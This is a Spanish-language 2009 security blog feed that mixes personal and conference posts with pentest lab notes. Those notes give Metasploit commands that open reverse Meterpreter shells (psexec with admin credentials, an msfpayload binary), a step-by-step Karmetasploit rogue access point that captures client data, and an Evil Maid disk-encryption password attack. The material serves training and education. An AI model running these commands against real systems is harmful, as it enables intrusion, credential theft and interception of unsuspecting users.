KungFooSion

Seguridad de los nuevos DNI Argentinos

noreply@blogger.com (KungFooSion) — Wed, 11 Nov 2009 18:11:00 +0000

En el blog de Matt me encontré con un interesante video de La Nación que relata las medidas de seguridad de los nuevos DNI Argentinos.

Casualmente, hace alrededor de 1 mes inicie los tramites para obtener un nuevo DNI porque me perdieron el anterior (si Gesolmina, fuistes vos!), obviamente esperaba tener mi documento para el 2011, con suerte. Pero increíblemente, a solo unos días del anuncio de los nuevos DNI, hoy llego Correo Argentino a traerme mi nuevo documento!

Ahora, yo no puedo tener mas mala suerte, el cartero me pedía un "papelito" que supuestamente me dieron cuando realice el tramite, y como no se donde deje ese papelito, no me entrego el DNI... aaaarrgggggggHHH!!!

PampaSeg en Diciembre

noreply@blogger.com (KungFooSion) — Wed, 11 Nov 2009 17:24:00 +0000

El próximo 4 y 5 de Diciembre tendrán lugar las Jornadas de Software Libre y Seguridad Informatica en La Pampa.

El evento es abierto a toda la comunidad, con entrada libre y gratuita. El cupo es limitado a unas 100 personas aproximadamente, por lo cual se requerirá una pre-acreditación desde la web http://www.pampaseg.com

Voy a tener el gusto de dar una charla en este evento, asi que si estan por La Pampa por esas fechas nos vemos alli!

Prefetch en Meterpreter

noreply@blogger.com (KungFooSion) — Sun, 08 Nov 2009 03:08:00 +0000

Siempre me llama la atención la integración de técnicas forenses y anti-forenses al Penetration Testing, como el reciente script para Meterpreter que permite obtener los datos de Prefetch.

¿ Que es Prefetch ?

Cada vez que abrimos una aplicación en Windows se crea un archivo ".pf" en el directorio (%SYSTEMROOT%\Prefetch\), este archivo contiene información para acelerar las aplicaciones que seran abiertas en el futuro.

Dentro del archivo .pf podemos encontrar la fecha y hora en la que el archivo fue abierto, modificado o accedido por ultima vez, y también la cantidad de veces que este fue ejecutado.

El nombre del archivo .pf se arma "NOMBRE-HASH.pf", en donde el HASH se calcula con el path del lugar en donde se encontraba el archivo, por lo que si este fue ejecutado de 2 lugares diferentes, vamos a tener 2 archivos .pf diferentes.

Durante un Penetration Test, conocer cuales son los programas mas utilizados en un sistema nos puede ayudar a identificar los hábitos del administrador o el rol de este sistema en la red.

Hay una herramienta gratuita llamada Windows File Analyzer que nos permite visualizar el contenido de los archivos Prefetch:

Shell con Meterpreter

A continuación dos formas sencillas de obtener una shell con meterpreter sin necesidad de explotar una vulnerabilidad.

El siguiente modulo es similiar al "psexec" de SysInternals, y si le proveemos el user/pass de la víctima, nos permitira ejecutar un "payload":


use windows/smb/psexec
set PAYLOAD windows/metepreter/reverse_tcp
set RHOST 192.168.13.129
set LHOST 192.168.13.131
set SMBUser Administrador
set SMBPass password
exploit

Otra forma, es crear un binario con el payload, lo transferimos a la víctima, luego dejamos escuchando por la conexión reversa y ejecutamos el binario para generar la conexión con meterpreter:


./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.13.131 X > meterpreter.exe

./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.13.131 E

Prefetch con Meterpreter

Para utilizar Prefetch primero deberíamos actualizar Metasploit (esto hacerlo antes de obtener la shell):


cd /pentest/exploits/framework3
svn update

./msfconsole
run prefetchtool -h

Si es la primera vez que utilizamos Prefetch, el script bajara "prefetch.exe" del repositorio, para luego subirlo y ejecutarlo en la víctima. A continuación listamos los 5 programas mas utilizados en la víctima con el comando "run prefetchtool -x 5":

Otra feature interesante dentro de meterpreter es "timestomp", que nos permite modificar la fecha de creación, modificación y ultimo acceso de los archivos, pero eso lo dejo para otro post... ;)

FUENTES:
- Milo2012's Security Blog: Meterpreter Script for Prefetch-Tool
- Laramies Corner: Windows Prefetcher and forensic analysis
- Windows File Analyzer
- PaulDotCom - Episode 171
- What is the Prefetcher?
- Forensics Wiki - Prefetch

Una Final Dramática!

noreply@blogger.com (KungFooSion) — Fri, 06 Nov 2009 15:48:00 +0000

El día de ayer termino el COMBAT training (extended edition) con una final dramática en el CTF "Capture The Flag"!

La versión extendida del COMBAT training se dicto 1 día por semana, durante 5 semanas, e iba dirigida a quienes no podían tomarse una semana completa de training.

Quiero felicitar a Patricio Castagnaro quien gano el CTF y se llevo la espada ninja, y también a Diego Nadares que dio una gran pelea en todo momento! También extender las felicitaciones a Esteban Piloni y Sergio "Moises" Veron por el gran trabajo durante toda la semana!

Como siempre los premios del COMBAT training son armas orientales, esta vez teníamos la espada ninja para el primer lugar, un set de cuchillos para lanzar para el segundo y estrellas ninjas para el resto.

Jeronimo Basaldua, el experto en Wireless Security de BASE4, dicto el modulo de Wireless Hacking del COMBAT training.

Lamentablemente Jeronimo sufrió un accidente manipulando la espada (miren su frente en la foto grupal), al parecer Jeronimo estudiaba kendo unos años atras y en una maniobra poco afortunada durante el training se corto a si mismo... :?

Por consultas sobre el COMBAT training contactarse a capacitacion@base4sec.com

Karmetasploit en BackTrack 4

noreply@blogger.com (KungFooSion) — Thu, 05 Nov 2009 04:50:00 +0000

Actualizando algunos labs del COMBAT training para BackTrack 4, aquí les dejo algunas notas para jugar con Karmetasploit.


- Ponemos la placa en modo monitor:

airmon-ng start wlan0


- Levantamos el Access Point falso en la interfaz en modo
monitor:

airbase-ng -P -C 30 -e “Linksys” -v mon0


- Configuramos el rango de IPs que entregara el servidor
DHCP:

nano /etc/dhcp3/dhcpd.conf

option domain-name-servers 10.0.0.1;
default-lease-time 60;
max-lease-time 72;
ddns-update-style none;
log-facility local7;

subnet 10.0.0.0 netmask 255.255.255.0 {
range 10.0.0.140 10.0.0.240;
option routers 10.0.0.1;
option domain-name-servers 10.0.0.1;
}


- Configuramos la IP en la interfaz que creo airbase-ng:

ifconfig at0 up 10.0.0.1 netmask 255.255.255.0


- Levantamos el DHCP que le entregara las IPs a las
victimas que se conecten al Access Point falso:

/etc/init.d/dhcp3-server start


- Vemos las IPs que entrega el DHCP:

tail -f /var/log/messages


- Bajamos el script de Karma y corremos Metasploit:

cd /pentest/exploits/framework3

wget http://digitaloffense.net/tools/karma.rc

./msfconsole -r karma.rc


- Podemos obtener los datos guardados en karma.db
de esta forma:

sqlite3 karma.db
.tables
select * from notes;
.quit

Tres Minutos de Furia

noreply@blogger.com (KungFooSion) — Mon, 02 Nov 2009 02:16:00 +0000

Hoy tuvo lugar la 2a fecha del Torneo Argentino de Paintball y pase la tarde como "utilero" del equipo LOD (Legion of Doom), unos amigos que competían.

Todavía me acuerdo de los comienzos de LOD y ese famoso partido en Urban Paintball donde nos robaron de comienzo a fin... :P

Go Go Go LOD! Vamos por la tercer fecha! ;-)

Publicados los Videos del Seminario de ArCERT

noreply@blogger.com (KungFooSion) — Tue, 27 Oct 2009 16:04:00 +0000

ArCERT publico los videos de las jornadas de seguridad realizadas recientemente para festejar sus 10 años de vida.

El evento tuvo lugar el 1 y 2 de Octubre, y se dividio en un dia de seminarios y otro de talleres sobre seguridad informática. El evento fue realmente excelente, principalmente por la calidad de los oradores, asi que mis felicitaciones para el ArCERT.

Videos de los TALLERES:

- Ingeniería reversa de malware: Una introducción (Hernan Racciatti)

- Wireless 802.11 "el otro lado" (Ezequiel Sallis)

- Tendencias de seguridad en tecnologías para aplicaciones (Ivan Arce)

- La Web desde el ojo de un atacante (Nahuel Grisolia)

Videos de los SEMINARIOS:

- Apertura de las Jornadas (Juan Manuel Abal Medina - Eduardo Thill)

- La respuesta internacional a los incidentes de seguridad (Eduardo Carozo - Gaston Franco)

- La visión Jurídica: necesidad de marco normativo (Lisandro Teskiewicz - Pablo Pallazi - Ricardo Saenz - Gustavo Presman)

- La seguridad cibernética en el gobierno de Brasil (Raphael Mandarino Jr.)

- La visión del Sector Privado: necesidad de articulación (Julio Ardita - Horacio Barrozo - Pablo Silberfich)

- Protección de infraestructura criticas de España (Fernando Jose Sanchez Gomez - Tomas Martin Iñurrieta)

- ArCERT: 10 años de experiencia - Pasado y futuro (Pedro Janices - Patricia Prandini)

Concientización de Usuarios

noreply@blogger.com (KungFooSion) — Mon, 26 Oct 2009 15:08:00 +0000

Los que trabajamos en seguridad siempre nos encontramos con dificultades a la hora de concientizar a los usuarios sobre los riesgos, tal vez deberíamos aprender sobre las campañas de concientización que se hacen en los viejos ascensores de Buenos Aires :-?

Kit del Presentador

noreply@blogger.com (KungFooSion) — Fri, 23 Oct 2009 19:45:00 +0000

Como no todo pasa por el Presentation Zen, aquí les dejo algunas recomendaciones sobre hardware que me ha resultado muy bueno al momento de dar trainings y presentaciones.

Control Remoto y Puntero Laser

El siguiente es el Logitech 2.4 GHz Cordless Presenter, realmente una joya!! lo que mas me gusta es que es sencillo, básico y muy profesional:

Diseñado para Windows/PowerPoint pero con Mac/Keynote tambien funciona sin ningun problema.

Posee incorporado un puntero laser muy poderoso, permite controlar el volumen de nuestra laptop, salir de la presentación, poner la pantalla en negro(solo en Windows) y tiene un timer para que podamos controlar el tiempo. Altamente recomendable.

Proyector de Video

Esto debe ser a lo que menos importancia le damos durante una presentación, y en charlas técnicas donde hacemos demos en vivo juegan un papel muy importante.

Para mi la clave del proyector se encuentra en la resolución que puede manejar, mas aun cuando al crear los slides de nuestra charla podemos elegir con que resolución hacerlos, imaginense armar los slides de 1280 x 720 y que el proyector solo maneje 800 x 600.

Peor aun es si nuestra laptop tiene una pantalla "wide" de 1280 x 800 y hacemos demos en vivo con varias máquinas virtuales. Me paso que el proyector solo soportaba 800 x 600 y las pantallas de las VM's quedaron demasiado grandes.

El siguiente es un proyector Dell 1609WX, soporta 1280 x 800 por lo que podemos proyectar en formato wide sin problemas:

Soporta 2500 lumenes, lo que también es un factor importante si estamos proyectando desde lejos o en lugares luminosos.

Lo que todavía no pude probar son esos lapices que te permiten escribir en la pantalla, igualito a lo que hacia Alfredo Ortega en la ekoparty ;-) Mas recomendaciones son bienvenidas!

Posts relacionados:
- Cómo Mejorar Nuestras Presentaciones
- Claves Para una Presentación Inolvidable

USB Booting con VMWare

noreply@blogger.com (KungFooSion) — Wed, 21 Oct 2009 23:56:00 +0000

Estuve probando el ataque "Evil Maid" en una máquina virtual y me encontré con que la BIOS de VMWare no soporta el booteo desde USB... increíble!

Evil Maid es un ataque contra sistemas que tienen cifrado completo de disco como TrueCrypt, y la idea consiste en conectar un pendrive USB con una imagen booteable de Linux que instalaría un "sniffer". Luego cuando el usuario ingrese su contraseña de TrueCrypt, esta quedaría guardada en alguna parte del disco, y el atacante la podría obtener volviendo a bootear la laptop desde el pendrive USB.

Al parecer el hardware virtual de VMWare esta basado en una motherboard para Pentium 2 y en aquella época las BIOS no permitían bootear desde USB. Intente que VMWare directamente bootee la imagen del pendrive pero no funciono, asi que encontré el siguiente workaround por si alguien necesita bootear desde USB.

Antes que nada, el booteo de VMWare es tan rápido que no da tiempo a intentar ingresar a la BIOS, pero agregando la siguiente linea en el archivo ".vmx" podremos forzar el ingreso durante un booteo:

bios.forceSetupOnce = "TRUE"

Para bootear con USB, primero vamos a decirle a VMWare que bootee una imagen de un Boot Manager llamado PLoP:

Una vez que PLoP se ha cargado, entre otras opciones nos permitiría bootear desde USB:

Cuando elegimos bootear desde USB, finalmente se cargara el Linux que esta en el pendrive y podremos realizar el ataque "Evil Maid" en VMWare:

Igualmente el ataque nunca me funciono, Evil Maid no detecta el Boot Loader de TrueCrypt, pero estoy seguro que es algún problema de VMWare porque cuando hago el cifrado de todo el disco (lo hice 2 veces pfffff..) me aparecen algunos errores de integridad en el disco.

Después de dedicarle algunas horas a esto me aburri pero me gusto lo del USB Booting, todo esto lo probe con VMWare Fusion en Mac OS X Leopard.

- Evil Maid goes after TrueCrypt!
- PLoP Boot Manager

YETI Total Security

noreply@blogger.com (KungFooSion) — Mon, 19 Oct 2009 19:29:00 +0000

YETI Total Security, seguridad total para su empresa, presenta sus nuevos dispositivos de Bycicle Endpoint Protection:

Solamente jugando con mi kit del Club de Lockpicking y un candado marca YETI de la bicicleta de mi cuñada... ;-)

COMBAT Trainings en Rosario y Cordoba

noreply@blogger.com (KungFooSion) — Sun, 18 Oct 2009 23:40:00 +0000

Durante noviembre vamos a tener una maraton de COMBAT Trainings que van a incluir las ciudades de Rosario y Cordoba. Stay Tunned!

Actualmente estamos dictando el COMBAT Training -extended edition-, que es el clásico training intensivo de 5 dias pero dictado en un 1 dia por semana durante 5 semanas. En este momento vamos por la segunda semana, asi que los interesados en esta modalidad deberán esperar hasta el próximo año.

Mientras tanto, este es el calendario de trainings para Noviembre:

- Córdoba Capital (16 al 20 de Noviembre)

- Ciudad de Buenos Aires (23 al 27 de Noviembre)

- Rosario (30 de Noviembre al 04 de Diciembre)

También estamos planificando trainings en Mendoza, Tierra del Fuego y el sur de Chile, si estan interesados pueden contactarse con Sol Argento a capacitacion@base4sec.com.

Mas info sobre los trainings aqui o en la web de base4.

El Maravilloso Mundo del Photoshop II

noreply@blogger.com (KungFooSion) — Tue, 13 Oct 2009 18:11:00 +0000

Un estudio logro demostrar como el contraste de una imagen es un factor importante para la percepción del genero sexual de una cara.

A continuación, pueden ver a la izquierda la imagen de una mujer y a la derecha la de un hombre, ¿o no?

Este fue el ganador del tercer lugar de un concurso de efectos visuales, en donde a una misma cara "androgina", cuando se le aplica mayor contraste se crea la ilusion del sexo femenino y con menor contraste la del sexo masculino.

Me pregunto si este tipo de técnicas se esta utilizando para realizar reconocimientos automáticos faciales en imágenes.

Hablando de efectos visuales, no queria dejar de mencionar el desastre de photoshop de Ralph Lauren de la semana pasada, en donde retocaron el cuerpo de una modelo a formas realmente imposibles para un ser humano.

Luego de que varios medios hablaran sobre esto, Ralph Lauren intento censurar a los mismos mediante DMCA takedown notices, y a partir de allí el desastre se transformo en catástrofe cuando todo el mundo comenzó a hablar sobre ello, lo que se conoce como el Streisand Effect.

- El Maravilloso Mundo del Photoshop I

El Arte de la Elegancia

noreply@blogger.com (KungFooSion) — Tue, 13 Oct 2009 02:58:00 +0000

Recien vuelvo del recital de Los Fabulosos Cadillacs donde presentaban su nuevo disco "El Arte de la Elegancia de LFC".

Inesperadamente, unas horas antes del recital cayeron a mis manos 2 entradas para el VIP del recital!! y hacia alli partimos con el amigo Cinic.

El recital estuvo verdaderamente excelente!! no recuerdo la ultima vez que vi a Los Cadillacs en vivo, pero puedo decir que no han perdido su magia :-)

El siguiente es uno de los momentos interesantes del recital, en donde Vicentico hace referencia a un problema que hay con los vecinos de la zona que siempre se quejan por los ruidos molestos que generan los recitales que se hacen en ese estadio.

Excelente haber terminado el fin de semana largo de esta forma ;-)

The Lockpicking Club

noreply@blogger.com (KungFooSion) — Fri, 09 Oct 2009 13:40:00 +0000

The first rule of Lockpicking Club is, you do not talk about Lockpicking Club.

El amigo Augusto Pereyra fundo el primer Club de Lockpicking argentino, lo cual me parece muy interesante para que todos los profesionales de seguridad tomemos conciencia sobre la importancia de la seguridad física.

Me contaba Augusto que la idea de que el Club sea privado se debe a que no es la idea capacitar "cacos" en el arte de abrir cerraduras, lo cual comparto totalmente. Mientras tanto yo ya recibi mi primer juego de ganzúas gratis y finalmente pude abrir algunos candados! ;-)

A continuación les copio una descripción sobre el Club de Lockpicking que me envio Augusto:

La finalidad de este club es la de entrenar a sus miembros en el arte de apertura de cerraduras con fines educativos, y esta orientado a personas interesados en la seguridad física o la cerrajería. El conocimiento es transmitido de persona a persona y la intención no es la de realizar grandes reuniones con todos los miembros que generalmente serán de a 3.

Para formar parte hay que ser recomendado por un socio y poseer un candado o cerradura perteneciente al catalogo oficial del club. La idea es que los candados vayan rotando por todos los miembros del club para que todos puedan abrir todos. Una vez que un miembro abre un candado delante de los otros 2 de la reunión se certifica que puede abrir ese candado y en la planilla de habilidades del miembro se anota el código del candado que abre. No es necesario se un experto para formar parte del club a medida que se intercambien mas candados se incrementara su habilidad hasta lograr abrir el total de los candados.

Cuantos mas miembros mas cerraduras habrá. Una idea que estoy preparando es la de regalar una palanca y una ganzúa casera a cada miembro hecha por el que recomienda al nuevo miembro. Por ejemplo los primeros 10 miembros los conseguí yo, así que a esos 10 yo les arme una ganzúa y un palanca para que practiquen, la idea es que los demás miembros sigan esta tradición para incentivar el crecimiento del club.

Por favor cualquier duda sobre el Club de Lockpicking contactense con Augusto a su mail: aepereyra (at) gmail (dot) com

Jugando con AirPcap

noreply@blogger.com (KungFooSion) — Wed, 07 Oct 2009 18:46:00 +0000

Hace poco, uno de los alumnos de mi COMBAT trainings me presto una placa wireless AirPcap, y después de haber jugado un tiempo con la misma, puedo decir que realmente esta muy buena!

Aquí les dejo algunos comentarios, pero aclaro que estoy lejos de ser un experto en wireless y estas son simplemente las notas de un usuario. n00b! :P

Las placas AirPcap pertenecen al portfolio de productos de la empresa CACE Technologies, quienes actualmente sponsorean el desarrollo de Wireshark y WinPcap.

Lo especial de estas placas es que te permiten capturar e inyectar paquetes en Windows! Esta placa en particular es el modelo AirPcap Ex que tiene un costo de 498USD! A continuación pueden ver algunas de sus features:

Obviamente esta placa esta totalmente soportada por Wireshark, y algo que realmente me fascino fue la posibilidad de capturar la señal de radio completa. Estas placas pueden capturar trafico 802.11a/b/g a bajo nivel, incluyendo frames de datos, de control y de management.

Opciones de captura de la placa:

Capturando frames 802.11:

Las capturas las realiza en un canal a la vez, pero cuando hay mas de un Access Point en el mismo canal, captura el trafico de todos los que encuentren en ese canal.

Si es necesario monitorear varios canales a la vez, la empresa también provee lo que llaman CACE Multi-Channel Aggregator, que seria una especie de hub USB donde se deben conectar 3 placas AirPcap, lo que nos permitiría realizar esto. Algo muy importante, es que la captura se realizaría de forma "agregada", osea que se generaría un único archivo de captura de trafico, correctamente correlacionado en el tiempo.

Otro software que soporta completamente AirPcap es Cain & Abel, por lo que es muy sencillo romper WEP y acelerar el cracking de WPA inyectando paquetes. Hasta donde tengo entendido la única placa soportada totalmente por Cain & Abel para hacer todas estas cosas es AirPcap:

Finalizando, me quedo con mi placa EUSSO con chip Atheros de 25USD y a full con aircrack en BT, pero si tuviera el dinero para comprarme la AirPcap lo haria!

Si alguien tiene algo mas para aportar sobre estas placas bienvenido.

Seguime en Twitter!

noreply@blogger.com (KungFooSion) — Mon, 28 Sep 2009 17:30:00 +0000

Faltan 12 dias para el Maraton de Buenos Aires y tengo planeada twittearla a lo largo de cada uno de sus 42km. Seguime en Twitter!

http://twitter.com/kfs

Algo que descubri recientemente, es que irte 10 dias a Las Vegas y organizar una conferencia de seguridad no es lo mas recomendable cuando estas entrenando para correr tu primer maraton...

Igualmente estoy muy entusiasmado con la posibilidad de correr mis primeros 42km y 192m(distancia oficial del maraton), y como parte de mi campaña para que los Geeks CORRAN! voy a hacer un twitt a cada kilómetro. Después contare mas detalles técnicos de como voy a hacer esto ;-)

Mientras tanto les dejo un video de mis entrenamientos diarios:

Geeks Runners! que creen... ¿ realidad o fantasía ?

Video de la ekoparty en Clarin

noreply@blogger.com (KungFooSion) — Mon, 28 Sep 2009 12:48:00 +0000

ekoparty 2009 un Exito!

noreply@blogger.com (KungFooSion) — Sun, 20 Sep 2009 14:57:00 +0000

Finalmente termino la ekoparty y por todos los comentarios y felicitaciones recibidas podemos decir que fue todo un exito! :-)

Es muy difícil para mi hablar objetivamente sobre la ekoparty porque conozco todo el trabajo que hay detrás, prácticamente los últimos 3 meses dedicamos una importante parte de nuestro tiempo a este proyecto y las ultimas 3 semanas estuvimos dedicados a esto casi exclusivamente. Es increíble que todo este trabajo transcurrió en solo 2 dias de la conferencia!

Fue muy importante toda la ayuda que recibimos de la gente que nos rodea, sin el apoyo y la ayuda practica de muchos amigos seria imposible hacer la ekoparty... mil gracias a todos!!!

Hay tanto para decir de la ekoparty que sinceramente no puedo decir nada mas, con lo único que me quedo, es que después de esta ekoparty 2009 podemos afirmar que no tenemos nada que envidiarle a ninguna conferencia del mundo! ;-)

Como todos saben, las dos primeras ediciones de la ekoparty fueron reuniones privadas que se hicieron por el año 2000 y luego la ekoparty resurgió como el evento publico que conocemos hoy en dia. Tambien me sorprende que muchos de los amigos con los que nos reuniamos diez años atras, hoy nos sigamos reencontrando en la ekoparty, pero ya como profesionales de seguridad... :-D

A modo de curiosidad, esta es la única foto que hay de la ekoparty #1 que se hizo por el año 2000:

ekoparty NINJAS

noreply@blogger.com (KungFooSion) — Wed, 16 Sep 2009 18:29:00 +0000

Durante el Lunes y Martes un nuevo grupo de Ninjas tomo el COMBAT training en la semana de la ekoparty!

Quiero felicitarlos a todos por el excelente trabajo!! y especialmente a Bruno Di Lorenzo Sainz por ganar el CTF!

Después de que pase la ekoparty contare mas sobre los trainings y subire las fotos.

Fundar sin Fundir

noreply@blogger.com (KungFooSion) — Fri, 11 Sep 2009 01:59:00 +0000

Este es un video de solo 5 minutos de Damian Voltes, un emprendedor serial, en donde brevemente relata las claves para fundar una empresa y no fundirla en el intento.

ekoparty: Ultima Oportunidad!

noreply@blogger.com (KungFooSion) — Wed, 09 Sep 2009 16:04:00 +0000

Los que todavía no tienen su entrada para la conferencia, o su lugar reservado en los trainings, solo les queda tiempo hasta este Viernes!

Si no quieren esperar hasta la ekoparty 2010 contáctense a organizacion@ekoparty.org y consulten por los descuentos disponibles.

Le pido a todos los amigos bloggers que posteen en sus blogs, recordándole a sus lectores los últimos días restantes para la ekoparty!

www.ekoparty.org

Camino a la Maratón!

noreply@blogger.com (KungFooSion) — Mon, 07 Sep 2009 16:59:00 +0000

Ayer por la mañana corrí una carrera de 30km preparatoria para la Maratón de Buenos Aires en Octubre.

Fueron mis primeros 30km, mi máxima distancia hasta el momento, anteriormente solo habia corrido dos media-maratones (21km). Mi tiempo fue de 02:44:35, corriendo a 05:29 el kilómetro.

A esta carrera de 30km la sufri muchísimo, las ultimas semanas no venia entrenando mucho y a esto se sumo una lesion en una rodilla. Sin mencionar que el circuito de la carrera era muy aburrido, 3 vueltas de 10km en Costanera Sur...

Lo positivo es que llegue!! :-) El tiempo que hice fue bastante bueno, en el estado físico en el que me encontraba y por otro lado es lo que habia planeado hacer.

Nuevamente fue fundamental pertenecer a un grupo de corredores, los Trotadores Urbanos, que me brindaron toda la contención necesaria para cumplir con este objetivo. En particular quiero agradecer a Emanuel que me acompaño los últimos 10km de la carrera, gracias Ema!! :-)

Próximo objetivo: MARATON DE BUENOS AIRES (42km) !!!!!

COMBAT training (NINJA edition)

noreply@blogger.com (KungFooSion) — Wed, 02 Sep 2009 15:40:00 +0000

Nuevamente vuelve el COMBAT training! pero esta vez con una NINJA edition especialmente diseñada para la ekoparty.

El COMBAT training es un curso altamente práctico que en su versión clásica tiene una duración de 5 días. La NINJA edition del COMBAT training, toma lo mejor de la versión clásica pero en una edición aun mas práctica e intensiva de solo 2 días.

Esta NINJA edition va a estar focalizada en técnicas de explotación y post-explotación, siempre utilizando el framework MetaSploit, y con un día completo sobre ataques del tipo Client Side que tan populares y efectivos son actualmente.

Como en todos los COMBAT trainings, al final del curso se realizara una competencia de hacking en donde los alumnos implementarán todo lo aprendido. El ganador de esta competencia recibira una espada Ninja verdadera! (no nos hacemos responsables de cualquier accidente que pueda llegar a ocurrir) el 2o y 3er puesto también recibirán armas orientales verdaderas que todavía no hemos definido ;-)

Mas INFO aquí!

Tampoco puedo dejar de mencionar al resto de los cursos que seran dictados en la ekoparty. Me gustaría hacer notar que muchos de ellos solo se dictan 1 vez al año, durante la ekoparty, y hay otros que seran presentados por primera vez en Latinoamerica!

Breaking Windows	Damian Gomez, Immunity
COMBAT Training (NINJA edition)	Leonardo Pigñer, BASE4 Security
Evaluating Secure Protocols and Intercepting Secure Communication	Moxie Marlinspike
Hacking and Defending Oracle Databases	Esteban Martínez Fayó, ARGENISS
Lockpicking & Physical Security - from novice to master in one day	Deviant Ollam, TOOOL
Programando Shellcode en Windows desde Cero	Pablo Solé, Immunity
Técnicas de Inyección (ciegas) en aplicaciones Web	Chema Alonso, Informatica 64
Web Testing & Exploiting Workshop	Andrés Riancho, Bonsai

No es una oportunidad para dejar pasar y además en el costo esta incluida la entrada a la conferencia.

Pueden hacer consultas a: organizacion@ekoparty.org

Nmap actualiza su PING

noreply@blogger.com (KungFooSion) — Sun, 30 Aug 2009 23:53:00 +0000

Dentro de los importantes cambios realizados a la nueva versión de Nmap (5.0) me sorprendió encontrar una nueva versión del famoso "PING de Nmap".

El PING de Nmap, también conocido como Ping Sweep, se encuentra dentro de la importante etapa de host discovery que se encarga de descubrir los hosts vivos a los cuales realizaremos luego el escaneo de puertos. En la versión 5.0 de Nmap se ha optimizado este algoritmo para que sea mas eficiente, pero lo que no deja de atormentarme durante las noches es porque no lo han modificado años atras y si realmente este nuevo algoritmo posee la mejor combinación de pruebas a realizar... :-?

http://nmap.org/5/#changes

"The host discovery (ping probe) defaults have been enhanced to include twice as many probes. The default is now "-PE -PS443 -PA80 -PP". In exhaustive testing of 90 different probes, this emerged as the best four-probe combination, finding 14% more Internet hosts than the previous default, "-PE -PA80". The default for non-root users is -PS80,443, replacing the previous default of -PS80. In addition, ping probes are now sent in order of effectiveness (-PE first) so that less effective probes may not have to be sent. ARP ping is still the default on local ethernet networks. "

Hasta que salió la versión 5.0, el PING de Nmap por default, consistia en enviar un ICMP echo-request (el clásico PING de ICMP) y un paquete ACK al puerto 80. Obviamente esto era efectivo muchos años atras cuando no existían firewalls stateful y los administradores no filtraban ICMP por default. (Mas info aquí)

Ahora al PING anterior, que consistia en un ICMP echo-request y un ACK al puerto 80, le agregaron un paquete SYN al puerto 443 y un paquete ICMP timestamp-request. Según lo que dice la web de Nmap, después de realizar 90 pruebas diferentes, esta combinación permitió encontrar un 14% mas de hosts en Internet.

Para mi la clave esta en la frase "14% more Internet hosts". Puedo decir que después de haber realizado muchos escaneos de puertos a lo largo de estos años, las redes argentinas y también latinoamericanas en Internet, son diferentes(puertos abiertos/cerrados/filtrados) al resto de redes en Internet de otros paises y obviamente representan un porcentaje sumamente chico del total de Internet.

Probablemente este nuevo algoritmo sea el mas efectivo en toda la Internet, pero tal vez tengamos que customizarlo para que sea aun mas efectivo en algunas redes en particular. IMHO

Algunos posts relacionados:
- Cómo Optimizar el Host Discovery en Nmap
- Los Puertos Más Usados En Internet
- Nunca Confíes En Tus Herramientas
- PortBunny y la Guerra de los Port Scanners